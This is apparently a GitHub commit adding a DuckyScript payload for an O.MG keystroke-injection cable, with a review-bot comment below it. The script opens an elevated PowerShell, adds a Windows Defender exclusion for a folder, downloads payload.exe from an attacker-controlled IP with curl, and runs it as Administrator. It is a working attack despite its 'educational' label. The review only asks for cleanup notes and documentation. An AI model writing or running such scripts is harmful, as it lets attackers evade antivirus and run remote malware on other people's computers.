Create Violate-Defender

### FOR EDUCATIONAL PURPOSES ONLY ####  
This is a simple DuckyScript that has been tested on the O.MG cable. It is designed to create a rule exception to a folder using PowerShell to circumvent Windows Defender. This may only work if the user/target in question has elevated rights to run a cmd/PowerShell prompt as Administrator. The script will use the curl command and download a file from your attacker machine and place it into a created folder of your choice while applying the exception to that folder.
pull/220/head
Tyler 2024-01-01 20:56:44 -05:00 committed by GitHub
parent 78066ea0c2
commit c1882928ee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

@ -0,0 +1,38 @@
DUCKY_LANG US
DELAY 2000
GUI r
STRING cmd
DELAY 300
CTRL+SHIFT ENTER
DELAY 300
TAB
DELAY 200
TAB
DELAY 200
TAB
ENTER
DELAY 200
STRING powershell
DELAY 500
ENTER
STRING mkdir C:\<created folder of your choice> ### change me ###
DELAY 100
ENTER
STRING Add-MpPreference -ExclusionPath 'C:\folder of your choice' ### change me ###
ENTER
DELAY 500
STRING curl http://<---IP---->:<PORT>/payload.exe -o C:\folder_of_choice\created_payload.exe ### change me ###
ENTER
DELAY 500
STRING cd C:\<created folder>
ENTER
DELAY 200
STRING .\payload.exe ### change to desired, compiled payload ###
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 100
STRING exit
DELAY 100
ENTER
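
Review bot: Missing cleanup and documentation around the `Add-MpPreference -ExclusionPath` line: the script ends with two `exit` commands and nothing removes the exclusion, so any machine this is run on keeps an unscanned folder until someone notices. Please add a `REM` header to the file that states the requirements already given in the commit message (elevated prompt, O.MG cable tested) and says plainly that the script changes Defender configuration and leaves the folder and exclusion behind, and document the matching `Remove-MpPreference -ExclusionPath` step so a test host can be restored afterwards. The header should also note that the `curl` line fetches the executable over plain `http://` with no integrity check before `.\payload.exe` is run from an elevated session, which means whatever answers at that address on the test network is what runs as Administrator.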